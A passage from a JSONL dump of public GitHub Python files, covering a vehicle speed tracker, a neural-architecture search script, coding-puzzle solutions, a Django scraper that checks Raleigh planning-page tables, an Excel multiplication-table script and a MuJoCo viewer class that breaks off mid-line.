track.time_since_update > 1:\r\n continue \r\n bbox = track.to_tlbr()\r\n class_name = track.get_class()\r\n \r\n # draw bbox on screen\r\n color = colors[int(track.track_id) % len(colors)]\r\n color = [i * 255 for i in color]\r\n cv2.rectangle(frame, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), color, 2)\r\n # cv2.rectangle(frame, (int(bbox[0]), int(bbox[1]-30)), (int(bbox[0])+(len(class_name)+len(str(track.track_id)))*17, int(bbox[1])), color, -1)\r\n # Make empty black image\r\n image_point = np.zeros(frame.shape,np.uint8)\r\n xx = (int(bbox[0]) + int(bbox[2]))//2\r\n yy = (int(bbox[1]) + int(bbox[3]))//2\r\n# =============================================================================\r\n# # Find the proper RoI\r\n# =============================================================================\r\n image_point[yy,xx]=[0,0,255]\r\n contours_r = [np.array(right_plane1, dtype=np.int32) ]\r\n contours_l = [np.array(left_plane1, dtype=np.int32) ]\r\n \r\n \r\n Inside_r = cv2.pointPolygonTest(contours_r[0], (xx,yy), False)\r\n Inside_l = cv2.pointPolygonTest(contours_l[0], (xx,yy), False)\r\n \r\n# =============================================================================\r\n# # Correct the perspective distortion\r\n# =============================================================================\r\n if Inside_r>0:\r\n warped_ = cv2.warpPerspective(image_point, warped_Mat_r,(maxWidth_r, maxHeight_r))\r\n maxWidth, maxHeight = (maxWidth_r, maxHeight_r)\r\n cars_list, frame = speed_estimation_module(frame,warped_,cars_list, track,bbox,maxWidth, maxHeight)\r\n if Inside_l>0:\r\n warped_ = cv2.warpPerspective(image_point, warped_Mat_l,(maxWidth_l, maxHeight_l))\r\n maxWidth, maxHeight = (maxWidth_l, maxHeight_l)\r\n# =============================================================================\r\n# # Calculate the speed\r\n# =============================================================================\r\n cars_list, frame = speed_estimation_module(frame,warped_,cars_list, track,bbox,maxWidth, maxHeight)\r\n\r\n # if enable info flag then print details about each track\r\n if FLAGS.info:\r\n print(\"Tracker ID: {}, Class: {}, BBox Coords (xmin, ymin, xmax, ymax): {}\".format(str(track.track_id), class_name, (int(bbox[0]), int(bbox[1]), int(bbox[2]), int(bbox[3]))))\r\n\r\n # calculate frames per second of running detections\r\n fps = 1.0 / (time.time() - start_time)\r\n print(\"FPS: %.2f\" % fps)\r\n result = np.asarray(frame)\r\n result = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\r\n\r\n if not FLAGS.dont_show:\r\n cv2.imshow(\"Output Video\", result)\r\n \r\n # if output flag is set, save video file\r\n if FLAGS.output:\r\n out.write(result)\r\n if cv2.waitKey(1) & 0xFF == ord('q'): break\r\n cv2.destroyAllWindows()\r\n\r\nif __name__ == '__main__':\r\n try:\r\n app.run(main)\r\n except SystemExit:\r\n pass\r\n","repo_name":"samirgholipour/speed_estimation","sub_path":"object_tracker.py","file_name":"object_tracker.py","file_ext":"py","file_size_in_byte":17091,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
+{"seq_id":"24384404985","text":"import numpy as np\nimport random\nimport sys\nsys.path.insert(0,'/homes/nj2217/FINAL_PROJECT/MAIN')\n# sys.path.insert(0,'/d/PROJECT/FINAL_PROJECT/MAIN')\n\nfrom HELPER_FUNCTION import *\nfrom TRAIN_MODEL_CIFAR10 import *\nfrom TRAIN_MODEL_MNIST import *\n\nMAX_ACTION = 16\nMAX_STATE = 4\nLAYER_ACTION = ['c_1','c_2','c_3','c_4','c_5','c_6','c_7','c_8','c_9','c_10','c_11',\\\n 'c_12','m_1','m_2','m_3','s']\n\nMAX_INDEX_MODEL_ARRAY = 1 + MAX_STATE + 2\nINDEX_MODEL = 0\nINDEX_ACCURACY = -2\n\ndef create_empty_array():\n ###########################################################################\n # FUNCTION DESCRIPTION: create empty array equal to state total state space\n # with each row consists of model_name,topologies,\n # accuracy and loss with '-'\n ###########################################################################\n\n final_array = []\n for _ in range(MAX_ACTION*MAX_STATE):\n temp_array = ['-']*MAX_INDEX_MODEL_ARRAY\n final_array.append(temp_array)\n return final_array\n\n\ndef init_layer_action(final_array,index_hill_level):\n ###########################################################################\n # FUNCTION DESCRIPTION: initialize array with each possible action\n ###########################################################################\n\n for index in range(MAX_ACTION):\n final_array[index+index_hill_level*MAX_ACTION][index_hill_level+1] = LAYER_ACTION[index]\n return final_array\n\ndef use_best_layer(final_array,best_layer,index_hill_level):\n ###########################################################################\n # FUNCTION DESCRIPTION: assign the layer with highest accuracy for next training\n ###########################################################################\n\n start_index = (1+index_hill_level)*MAX_ACTION\n final_index = MAX_STATE*MAX_ACTION\n for index in range(start_index,final_index):\n final_array[index][index_hill_level+1] = best_layer\n return final_array\n\ndef layerwise_search(DATASET,SAVE_FILE):\n ###########################################################################\n # FUNCTION DESCRIPTION: do layerwise search algorithm to find the topology that gives\n # highest validation accuracy\n ###########################################################################\n\n model_num = 0\n final_array = create_empty_array()\n\n for index_hill_level in range(MAX_STATE):\n final_array = init_layer_action(final_array,index_hill_level)\n accuracy_array = []\n\n for index_layer_in_hill in range(MAX_ACTION):\n\n for index_model_array in range(MAX_INDEX_MODEL_ARRAY):\n current_model_array = final_array[index_layer_in_hill+index_hill_level*MAX_ACTION]\n current_model_array[INDEX_MODEL] = 'model_'+str(model_num)\n\n if DATASET == 'cifar10':\n # accuracy = random.uniform(0, 1)\n accuracy = train_model_cifar10(current_model_array, DATASET)\n elif DATASET == 'mnist':\n # accuracy = random.uniform(0, 1)\n accuracy = train_model_mnist(current_model_array,DATASET)\n\n accuracy_array.append(accuracy)\n current_model_array[INDEX_ACCURACY] = accuracy\n\n eval_result = ['Unknown',accuracy]\n model_num += 1\n\n save_trained_model_in_csv(SAVE_FILE,current_model_array,eval_result)\n\n max_accuracy = max(accuracy_array)\n index_best_layer = accuracy_array.index(max_accuracy)\n best_layer = LAYER_ACTION[index_best_layer]\n\n if index_hill_level != MAX_STATE-1:\n final_array = use_best_layer(final_array, best_layer,index_hill_level)\n\n print(final_array)\n\ndef main():\n DATASET = 'cifar10'\n SAVE_FILE = 'hc_cifar10.csv'\n layerwise_search(DATASET,SAVE_FILE)\n\nif __name__ == '__main__':\n main()\n","repo_name":"thenatzzz/Qsearch_MSc_Final_project","sub_path":"LAYERWISE_SEARCH/LAYERWISE_algo.py","file_name":"LAYERWISE_algo.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"23585558501","text":"# Written by Nikolai Artemiev\n\nimport collections\nimport functools\nimport itertools\nimport math\nimport multiprocessing\nimport os\nimport resource\nimport sys\npi = math.pi\n\ndef solve(N, K, P):\n M = 0\n for b in range(N):\n AB = P[b][0] ** 2 * pi + (P[b][1] * P[b][0] * pi * 2)\n PA = [(p[1] * p[0] * pi * 2) for p in (P[:b] + P[b + 1:])]\n PA = sorted(PA, key = lambda x: -x)\n AB += sum(PA[:K - 1])\n M = max(M, AB)\n return M\n\n\n\n\ndef read(F):\n N, K = [int(num) for num in F.readline().split()]\n P = [[int(num) for num in F.readline().split()] for n in range(N)]\n return N, K, P\n\nif __name__ == \"__main__\":\n # Resize stack to useful size\n recursion_limit = 100000\n resource.setrlimit(resource.RLIMIT_STACK, [resource.RLIM_INFINITY, resource.RLIM_INFINITY])\n sys.setrecursionlimit(recursion_limit)\n\n if \"--input\" in sys.argv and len(sys.argv) >= sys.argv.index(\"--input\"):\n # Use input file from command line args\n input_file = sys.argv[sys.argv.index(\"--input\") + 1]\n else:\n # Find the most recently downloaded input file\n input_files = [name for name in os.listdir(\".\") if name.endswith(\".in\")]\n input_file = max(input_files, key = os.path.getmtime)\n\n # Read cases\n with open(input_file) as F:\n T = int(F.readline())\n cases = [read(F) for case in range(T)]\n\n # Solve\n def expand_solve(args): return solve(*args)\n\n solutions = multiprocessing.Pool().map(expand_solve, cases)\n\n # Print\n for case, solution in enumerate(solutions):\n print(\"Case #{}: {}\".format(case + 1, solution))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/230.py","file_name":"230.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17275644331","text":"\"\"\"This command is used to query the APIs, compare the results with the DB and make appropriate changes.\"\"\"\nimport logging\nfrom bs4 import BeautifulSoup\nimport requests\nimport sys\nfrom datetime import datetime\nfrom prettytable import PrettyTable\n\nfrom django.core.management.base import BaseCommand\nfrom develop.models import *\nfrom datetime import datetime\n\nfrom .emails import *\nlogger = logging.getLogger(\"django\")\n\n\ndef get_page_content(page_link):\n n = datetime.now()\n\n try:\n page_response = requests.get(page_link, timeout=10)\n except requests.exceptions.RequestException as e:\n print(n.strftime(\"%H:%M %m-%d-%y\") + \": Connection problem to \" + page_link)\n sys.exit(1)\n\n if page_response.status_code == 200:\n return BeautifulSoup(page_response.content, \"html.parser\")\n else:\n return None\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n sr_page_link = \"https://raleighnc.gov/services/zoning-planning-and-development/site-review-cases\"\n zon_page_link = \"https://raleighnc.gov/SupportPages/zoning-cases\"\n tc_page_link = \"https://raleighnc.gov/SupportPages/text-change-cases\"\n neighbor_page_link = \"https://raleighnc.gov/planning/neighborhood-meetings\"\n message = \"\"\n\n # scrape the target websites and verify that the table headers are what we expect.\n\n # Site Review tables\n sr_expected = [\"Case Number\", \"Project Name/Location/Description\", \"CAC\", \"Status*\", \"Contact\"]\n sr_expected_2022 = [\"Case Number\", \"Project Name/Location/Description\", \"Status*\", \"Contact\"]\n sr_tables = get_page_content(sr_page_link).find_all(\"table\")\n for sr_table in sr_tables:\n x = PrettyTable()\n sr_actual = []\n table_thead = sr_table.find(\"thead\")\n thead_row = table_thead.find_all(\"th\")\n if not thead_row:\n thead_row = table_thead.find_all(\"td\")\n\n for header in thead_row:\n sr_actual.append(header.get_text().strip())\n\n if sr_actual == sr_expected or sr_actual == sr_expected_2022:\n pass\n else:\n message = \"SR Table has changed.\\n\"\n try:\n x.add_row(sr_actual)\n x.add_row(sr_expected)\n message += str(x)\n except Exception as e:\n print(e)\n message += \"Problem with table. Please check site reviews.\"\n\n # AAD tables\n # aad_expected = [\"Case Number\", \"Project Name/Location/Description\", \"Status*\", \"Contact\"]\n # aad_tables = get_page_content(aad_page_link).find_all(\"table\")\n # for aad_table in aad_tables:\n # x = PrettyTable()\n # aad_actual = []\n # table_thead = aad_table.find(\"thead\")\n # thead_row = table_thead.find_all(\"td\")\n #\n # for header in thead_row:\n # aad_actual.append(header.get_text().strip())\n #\n # if aad_actual == aad_expected:\n # pass\n # else:\n # message = \"AAD Table has changed.\\n\"\n # try:\n # x.add_row(aad_actual)\n # x.add_row(aad_expected)\n # message += str(x)\n # except Exception as e:\n # print(e)\n # message += \"Problem with table. Please check AADs.\"\n\n # TCC tables\n tcc_expected = [\"Case Number\", \"Project Name/Location/Description\", \"Description\", \"Status\", \"Contact\"]\n tcc_tables = get_page_content(tc_page_link).find_all(\"table\")\n for tcc_table in tcc_tables[:1]:\n x = PrettyTable()\n tcc_actual = []\n table_thead = tcc_table.find(\"thead\")\n thead_row = table_thead.find_all(\"td\")\n\n for header in thead_row:\n tcc_actual.append(header.get_text().strip())\n\n if len(tcc_actual) > 0:\n if tcc_actual == tcc_expected:\n pass\n else:\n message = \"TCC Table has changed.\\n\"\n try:\n x.add_row(tcc_actual)\n x.add_row(tcc_expected)\n message += str(x)\n except Exception as e:\n print(e)\n message += \"Problem with table. Please check TCCs.\"\n\n # Zoning tables\n zon_expected = [\"Case Number, Application & Status\", \"Location & Map Link\", \"Council District\", \"Staff Contact\"]\n zon_tables = get_page_content(zon_page_link).find_all(\"table\")\n # for zon_table in zon_tables:\n x = PrettyTable()\n zon_actual = []\n table_thead = zon_tables[0].find(\"thead\")\n thead_row = table_thead.find_all(\"th\")\n if not thead_row:\n thead_row = table_thead.find_all(\"td\")\n\n for header in thead_row:\n zon_actual.append(header.get_text().strip().replace(\"\\n\", \"\"))\n\n if zon_actual == zon_expected:\n pass\n else:\n try:\n x.add_row(zon_actual)\n x.add_row(zon_expected)\n message = \"Zon Table has changed.\\n\"\n message += str(x)\n except Exception as e:\n print(e)\n message += \"Problem with table. Please check zoning.\"\n\n # Neighborhood meetings tables\n # neighbor_expected = [\"Meeting Details\", \"Rezoning Site Address\", \"Applicant/Link to Meeting Information\",\n # \"Council District\", \"Staff Contact\"]\n neighbor_expected = ['Date & Time', 'Meeting Location', 'Site Location & Map', 'Request',\n 'Council District', 'Applicant Contact', 'Staff Contact']\n neighbor_tables = get_page_content(neighbor_page_link).find_all(\"table\")\n for count, neighbor_table in enumerate(neighbor_tables):\n # June 2, 22: It's a table inside a table. So skip the first one. :(\n if count == 0:\n continue\n\n x = PrettyTable()\n neighbor_actual = []\n # thead_row = neighbor_table.find_all(\"tr\")[0]\n thead_row = neighbor_table.find(\"thead\")\n thead_row_items = thead_row.find_all(\"th\")\n\n for header in thead_row_items:\n neighbor_actual.append(header.get_text().strip().replace(\"\\n\", \"\"))\n\n if neighbor_actual == neighbor_expected:\n pass\n else:\n try:\n print(neighbor_actual)\n # print(neighbor_expected)\n x.add_row(neighbor_actual)\n x.add_row(neighbor_expected)\n message = \"Neighborhood Table has changed.\\n\"\n message += str(x)\n except Exception as e:\n print(e)\n message += \"Problem with neighborhood tables, please check.\"\n\n # DA case tables\n # da_expected = [\"Case Number\", \"Project Name/Location/Description\", \"Status*\", \"Contact\"]\n # da_tables = get_page_content(da_page_link).find_all(\"table\")\n # for da_table in da_tables:\n # x = PrettyTable()\n # da_actual = []\n # table_thead = da_table.find(\"thead\")\n # thead_row = table_thead.find_all(\"td\")\n #\n # for header in thead_row:\n # da_actual.append(header.get_text().strip())\n #\n # if da_actual == da_expected:\n # pass\n # else:\n # try:\n # x.add_row(da_actual)\n # x.add_row(da_expected)\n # message = \"DA Case Table has changed.\\n\"\n # message += str(x)\n # except Exception as e:\n # print(e)\n # message += \"Problem with da case tables, please check.\"\n\n if message:\n send_email_notice(message, email_admins())\n","repo_name":"dtraleigh/dtraleigh","sub_path":"develop/management/commands/COR_table_header_check.py","file_name":"COR_table_header_check.py","file_ext":"py","file_size_in_byte":8112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31827236996","text":"\"\"\"\n\n53. Maximum Subarray\nEasy\n\n14395\n\n679\n\nAdd to List\n\nShare\nGiven an integer array nums, find the contiguous subarray (containing at least one number) which has the largest sum and return its sum.\n\nA subarray is a contiguous part of an array.\n\n \n\nExample 1:\n\nInput: nums = [-2,1,-3,4,-1,2,1,-5,4]\nOutput: 6\nExplanation: [4,-1,2,1] has the largest sum = 6.\nExample 2:\n\nInput: nums = [1]\nOutput: 1\nExample 3:\n\nInput: nums = [5,4,-1,7,8]\nOutput: 23\n \n\nConstraints:\n\n1 <= nums.length <= 3 * 104\n-105 <= nums[i] <= 105\n \n\nFollow up: If you have figured out the O(n) solution, try coding another solution using the divide and conquer approach, which is more subtle.\n\n\"\"\"\n\n\nclass Solution:\n def maxSubArray(self, nums: list[int]) -> int:\n ans = -float('inf')\n a = 0\n for i in nums:\n a = max(i, a+i)\n ans = max(ans, a)\n return ans\n","repo_name":"UdayKiranPadhy/DS-And-Algo","sub_path":"Data Structures/Arrays/4-Maximum Subarray.py","file_name":"4-Maximum Subarray.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"17255130327","text":"# -*- coding: utf-8 -*-\n\n#! python3\n\nimport openpyxl, sys\n\nfrom openpyxl.styles import Font\nfrom openpyxl.styles import Color, Fill\nfrom openpyxl.cell import Cell\n\ntry:\n\tfrom openpyxl.cell import column_index_from_string,get_column_letter\nexcept ImportError:\n\tfrom openpyxl.utils import column_index_from_string,get_column_letter\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format=\" %(asctime)s - %(levelname)s - %(message)s\")\nlogging.disable(logging.CRITICAL)\n\nwb = openpyxl.Workbook() # create the workbook\nsheet = wb.active # switch to the active sheet, there should only be one\nsheet.title = \"Multi Table\" # rename the sheet\n\n# parse the command line\n\nmulti_number_cmdline = sys.argv[1] # should be the first argument in the command line i.e. the number, if you use 0 you get the program name\n\n# multi_number_cmdline = \"3\" # set for purposes of testing, disable at end of development\n\nlogging.debug('The command line value entered for the max multi-table value is: %s' % (multi_number_cmdline))\n\n# create the font style for the headers\n\nboldHeaderFont1 = Font(bold=True) # font object\n\n# create the frozen header row\n\nfor x in range(2,int(multi_number_cmdline) + 2): # since you started the loop at 2, then you need to shift the ending value by 2\n\tcolumn_letter = get_column_letter(x)\n\t# the row stays the same i.e. 1\n\tlogging.debug('Frozen row header - The current header column letter is: %s' % (column_letter))\n\tsheet[column_letter + '1'] = x - 1 # set that cell to the current x value in the loop\n\tlogging.debug('Frozen row header - The current header column letter and row number changed is: %s' % (column_letter + '1'))\n\t# alter the font to bold\n\tsheet[column_letter + '1'].font = boldHeaderFont1\n\tlogging.debug('The font for %s has been altered.' % (column_letter + '1'))\n\n# create the frozen header column\n\nfor x in range(2,int(multi_number_cmdline) + 2):\n\tsheet[\"A\" + str(x)] = x - 1\n\tlogging.debug('Frozen column header - The current header column letter and row number changed is: %s' % (\"A\" + str(x)))\n\t# alter the font to bold\n\tsheet[\"A\" + str(x)].font = boldHeaderFont1\n\tlogging.debug('The font for %s has been altered.' % (\"A\" + str(x)))\n\n# freeze the panes\n\nsheet.freeze_panes = 'B2' # row 1 and columns A\nlogging.debug('Panes frozen creating header row and header column.')\n\n# begin filling in the multiplication values\n\nfor colValue in range(2,int(multi_number_cmdline) + 2):\n\tcolumn_letter = get_column_letter(colValue)\n\tlogging.debug('Frozen row header - The current header column letter is: %s' % (column_letter))\n\tlogging.debug('Frozen row header - The current header column label is: %i' % (colValue - 1))\n\n\t# now to fill each value row by row within the column\n\tfor rowValue in range(2,int(multi_number_cmdline) + 2):\n\t\t# logging.debug('The current column value is: %i' % (colValue - 1))\n\t\t# logging.debug('The current row value is: %i' % (rowValue - 1))\n\t\tsheet[column_letter + str(rowValue)] = (colValue - 1) * (rowValue - 1)\n\t\tlogging.debug('The multiplication value set is: %i' % ((colValue - 1) * (rowValue - 1)))\n\n# save the final sheet\n\nwb.save('multiplicationTable.xlsx')\nlogging.debug('Spreadsheet file saved.')\n","repo_name":"sunnylam13/multiplicationTable_031918_1","sub_path":"multiplicationTable/multiplicationTable.py","file_name":"multiplicationTable.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27155914745","text":"from audioop import mul\nimport names\nimport random\n\nfrom verbs_related import pronom\n#import verbs_related\n#print(names.get_first_name())\n\n#print(random.choice(pronoms))\n#print(multiple)\n\nclass Pronom:\n def __init__(self):\n multiple=names.get_first_name()+\" et \"+names.get_first_name()\n pronoms=[\"tu\",\"il\",\"elle\",names.get_first_name(),\"nous\",\"vous\",\"elles\",\"ils\",multiple]\n self.pronom=random.choice(len(pronoms))\n def return_type_self(self):\n if self.pronom==0:\n return 2\n elif self.pronom==1 or self.pronom==2 or self.pronom==3:\n return 3\n elif self.pronom==4:\n return 4\n elif self.pronom==5:\n return 5\n elif self.pronom==6 or self.pronom==7 or self.pronom==8:\n return 6\n\n def return_list(self):\n id_pronom = Pronom.return_type_self()\n if id_pronom == 2:\n return [\"tu\",\"tu\",id_pronom]\n elif id_pronom == 3:\n return [\"il\",self.pronom,id_pronom]\n elif id_pronom==\"4\":\n return [\"nous\",\"nous\",id_pronom]\n elif id_pronom==5:\n return [\"vous\",\"vous\",id_pronom]\n elif id_pronom==6:\n return [\"ils\",self.pronom,id_pronom]\n\nwith open(\"verb_complete_list.txt\",\"r\",encoding='utf-8') as verbs_list:\n f=verbs_list.read().split(\"\\n\")\n print(f)","repo_name":"Darleanow/FunnyUselessThings","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4296456139","text":"def constrainedMatchPair(firstMatch,secondMatch,length):\r\n\tm = length\r\n\tnearHits = ()\r\n\tfor n in range(0,len(firstMatch)):\r\n\t\tn = firstMatch[n]\r\n\t\tfor k in range(0,len(secondMatch)):\r\n\t\t\tk = secondMatch[k]\r\n\t\t\tif n + m + 1 == k:\r\n\t\t\t\tnearHits = nearHits + (n,)\r\n\treturn nearHits\r\n\r\n","repo_name":"dcaligiuri/MIT-OCW-6.00","sub_path":"assignment3c.py","file_name":"assignment3c.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72300497794","text":"import mujoco\nimport glfw\nimport sys\nimport numpy as np\nimport time\nfrom callbacks import CallBacks\n\n\nclass MujocoViewer:\n def __init__(self, model, data):\n self.model = model\n self.data = data\n\n self._time_per_render = 1 / 60.0\n self._loop_count = 0\n self._fastmode = False\n # Graphing\n self._num_pnts = 100\n\n # create options, camera, scene, context\n self.vopt = mujoco.MjvOption()\n self.cam = mujoco.MjvCamera()\n self.scn = mujoco.MjvScene(self.model, maxgeom=10000)\n self.pert = mujoco.MjvPerturb()\n self.fig = mujoco.MjvFigure()\n mujoco.mjv_defaultFigure(self.fig)\n\n for n in range(0, len(self.model.sensor_adr) * 3):\n for i in range(0, 300):\n self.fig.linedata[n][2 * i] = float(-i)\n\n # get callbacks\n self.callbacks = CallBacks(\n model=self.model,\n data=self.data,\n vopt=self.vopt,\n scn=self.scn,\n cam=self.cam,\n pert=self.pert,\n )\n\n # Adjust placement and size of graph\n width, height = self.callbacks.get_viewport_width_height()\n width_adjustment = width % 4\n self.pid_viewport = mujoco.MjrRect(\n int(3 * width / 4) + width_adjustment,\n 0,\n int(width / 4),\n int(height / 4),\n )\n mujoco.mjr_figure(self.pid_viewport, self.fig, self.callbacks.ctx)\n\n self.fig.flg_extend = 1\n self.fig.flg_symmetric = 0\n\n # overlay, markers\n self._overlay = {}\n self._markers = []\n self._data_graph_line_names = []\n self._line_datas = []\n self._sensor_data = \"degree\"\n\n def prepare(self):\n self.callbacks._joints = True\n self.vopt.flags[mujoco.mjtVisFlag.mjVIS_JOINT] = self.callbacks._joints\n self.callbacks._convex_hull_rendering = True\n self.vopt.flags[\n mujoco.mjtVisFlag.mjVIS_CONVEXHULL\n ] = self.callbacks._convex_hull_rendering\n self.callbacks._wire_frame = True\n self.scn.flags[\n mujoco.mjtRndFlag.mjRND_WIREFRAME\n ] = self.callbacks._wire_frame\n self.callbacks._shadows = False\n self.scn.flags[\n mujoco.mjtRndFlag.mjRND_SHADOW\n ] = self.callbacks._shadows\n\n def fastmode(self, fast: bool = True) -> bool:\n if fast is not True:\n self._fastmode = False\n else:\n self._fastmode = True\n return self._fastmode\n\n def get_arrow_state(self):\n return (\n self.callbacks._key_up,\n self.callbacks._key_down,\n self.callbacks._key_right,\n self.callbacks._key_left,\n )\n\n def clean_screen(self):\n self.callbacks._hide_menu = True\n self.callbacks._hide_graph = True\n\n def add_marker(self, **marker_params):\n self._markers.append(marker_params)\n\n def _add_marker_to_scene(self, marker):\n if self.scn.ngeom >= self.scn.maxgeom:\n raise RuntimeError(\n \"Ran out of geoms. maxgeom: %d\" % self.scn.maxgeom\n )\n\n g = self.scn.geoms[self.scn.ngeom]\n # default values.\n g.dataid = -1\n g.objtype = mujoco.mjtObj.mjOBJ_UNKNOWN\n g.objid = -1\n g.category = mujoco.mjtCatBit.mjCAT_DECOR\n g.texid = -1\n g.texuniform = 0\n g.texrepeat[0] = 1\n g.texrepeat[1] = 1\n g.emission = 0\n g.specular = 0.5\n g.shininess = 0.5\n g.reflectance = 0\n g.type = mujoco.mjtGeom.mjGEOM_BOX\n g.size[:] = np.ones(3) * 0.1\n g.mat[:] = np.eye(3)\n g.rgba[:] = np.ones(4)\n\n for key, value in marker.items():\n if isinstance(value, (int, float, mujoco._enums.mjtGeom)):\n setattr(g, key, value)\n elif isinstance(value, (tuple, list, np.ndarray)):\n attr = getattr(g, key)\n attr[:] = np.asarray(value).reshape(attr.shape)\n elif isinstance(value, str):\n assert key == \"label\", \"Only label is a string in mjtGeom.\"\n if value is None:\n g.label[0] = 0\n else:\n g.label = value\n elif hasattr(g, key):\n raise ValueError(\n \"mjtGeom has attr {} but type {} is invalid\".format(\n key, type(value)\n )\n )\n else:\n raise ValueError(\"mjtGeom doesn't have field %s\" % key)\n\n self.scn.ngeom += 1\n\n return\n\n def _create_overlay(self):\n topleft = mujoco.mjtGridPos.mjGRID_TOPLEFT\n topright = mujoco.mjtGridPos.mjGRID_TOPRIGHT\n bottomleft = mujoco.mjtGridPos.mjGRID_BOTTOMLEFT\n bottomright = mujoco.mjtGridPos.mjGRID_BOTTOMRIGHT\n\n def add_overlay(gridpos, text1, text2):\n if gridpos not in self._overlay:\n self._overlay[gridpos] = [\"\", \"\"]\n self._overlay[gridpos][0] += text1 + \"\\n\"\n self._overlay[gridpos][1] += text2 + \"\\n\"\n\n if self.callbacks._render_every_frame:\n add_overlay(topleft, \"\", \"\")\n else:\n add_overlay(\n topleft,\n \"Run speed = %.3f x real time\" % self.callbacks._run_speed,\n \"[S]lower, [F]aster\",\n )\n add_overlay(\n topleft,\n \"Ren[d]er every frame\",\n \"On\" if self.callbacks._render_every_frame else \"Off\",\n )\n add_overlay(\n topleft,\n \"Switch camera (#cams = %d)\" % (self.model.ncam + 1),\n \"[Tab] (camera ID = %d)\" % self.cam.fixedcamid,\n )\n add_overlay(\n topleft,\n \"[C]ontact forces\",\n \"On\" if self.callbacks._contacts else \"Off\",\n )\n add_overlay(\n topleft, \"[J]oints\", \"On\" if self.callbacks._joints else \"Off\"\n )\n add_overlay(\n topleft, \"[I]nertia\", \"On\" if self.callbacks._inertias else \"Off\"\n )\n add_overlay(\n topleft,\n \"Toggle [G]raph overlay\",\n \"On\" if self.callbacks._hide_graph else \"Off\",\n )\n add_overlay(\n topleft, \"Center of [M]ass\", \"On\" if self.callbacks._com else \"Off\"\n )\n add_overlay(\n topleft, \"Shad[O]ws\", \"On\" if self.callbacks._shadows else \"Off\"\n )\n add_overlay(\n topleft,\n \"T[r]ansparent\",\n \"On\" if self.callbacks._transparent else \"Off\",\n )\n add_overlay(\n topleft,\n \"[W]ireframe\",\n \"On\" if self.callbacks._wire_frame else \"Off\",\n )\n add_overlay(\n topleft,\n \"Con[V]ex Hull Rendering\",\n \"On\" if self.callbacks._convex_hull_rendering else \"Off\",\n )\n if self.callbacks._paused is not None:\n if not self.callbacks._paused:\n add_overlay(topleft, \"Stop\", \"[Space]\")\n else:\n add_overlay(topleft, \"Start\", \"[Space]\")\n add_overlay(\n topleft, \"Advance simulation by one step\", \"[right arrow]\"\n )\n add_overlay(\n topleft,\n \"Referenc[e] frames\",\n \"On\" if self.vopt.frame == 1 else \"Off\",\n )\n add_overlay(topleft, \"[H]ide Menu\", \"\")\n if self.callbacks._image_idx > 0:\n fname = self.callbacks._image_path % (\n self.callbacks._image_idx - 1\n )\n add_overlay(topleft, \"Cap[t]ure frame\", \"Saved as %s\" % fname)\n else:\n add_overlay(topleft, \"Cap[t]ure frame\", \"\")\n add_overlay(topleft, \"Toggle geomgroup visibility\", \"0-4\")\n\n add_overlay(\n bottomleft, \"FPS\", \"%d%s\" % (1 / self._time_per_render, \"\")\n )\n add_overlay(\n bottomleft, \"Solver iterations\", str(self.data.solver_iter + 1)\n )\n add_overlay(\n bottomleft,\n \"Step\",\n str(round(self.data.time / self.model.opt.timestep)),\n )\n add_overlay(bottomleft, \"timestep\", \"%.5f\" % self.model.opt.timestep)\n # CUSTOM\n add_overlay(\n topright,\n \"Arrow_up: Previous joint\",\n \"On\" if self.callbacks._key_up is True else \"Off\",\n )\n add_overlay(\n topright,\n \"Arrow_down: Previous joint\",\n \"On\" if self.callbacks._key_down is True else \"Off\",\n )\n add_overlay(\n topright,\n \"Arrow_left: Previous joint\",\n \"On\" if self.callbacks._key_left is True else \"Off\",\n )\n add_overlay(\n topright,\n \"Arrow_right: Previous joint\",\n \"On\" if self.callbacks._key_right is True else \"Off\",\n )\n\n def apply_perturbations(self):\n self.data.xfrc_applied = np.zeros_like(self.data.xfrc_applied)\n mujoco.mjv_applyPerturbPose(self.model, self.data, self.pert, 0)\n mujoco.mjv_applyPerturbForce(self.model, self.data, self.pert)\n\n def add_sensor(self, sensor):\n \"\"\"\n sensor: \"all\" or 0,1,2...\n \"\"\"\n if sensor == \"all\":\n self.adrs = self.model.sensor_adr\n else:\n self.adrs = []\n for i in range(len(sensor)):\n try:\n self.adrs.append(self.model.sensor_adr[sensor[i]])\n except Exception as e:\n raise ValueError(\"Sensor is not found in XML file\")\n # print(self.adrs)\n\n def axis_autorange(self):\n self.set_axis_range(x_range=[1.0, -1.0], y_range=[1.0, -1.0])\n\n def set_axis_range(self, x_range, y_range):\n \"\"\"\n x_range : list [x_min, x_max]\n y_range : list [y_min, y_max]\n \"\"\"\n assert (\n type(x_range) == list\n ), \"x_range is not a list with x_min and x_max\"\n assert (\n type(y_range) == list\n ), \"y_range is not a list with y_min and y_max\"\n if x_range[0] < x_range[1]:\n self.fig.range[0][0] = x_range[0] # x_min\n self.fig.range[0][1] = x_range[1] # x_max\n elif x_range[0] > x_range[1]:\n # limits set to auto range since {x_min > x_max}\n self.fig.range[0][0] = x_range[1]\n self.fig.range[0][1] = x_range[0]\n\n elif y_range[0] < y_range[1]:\n self.fig.range[1][0] = y_range[0] # y_min\n self.fig.range[1][1] = y_range[1] # y_max\n elif y_range[0] > y_range[1]:\n # limits set to auto range since 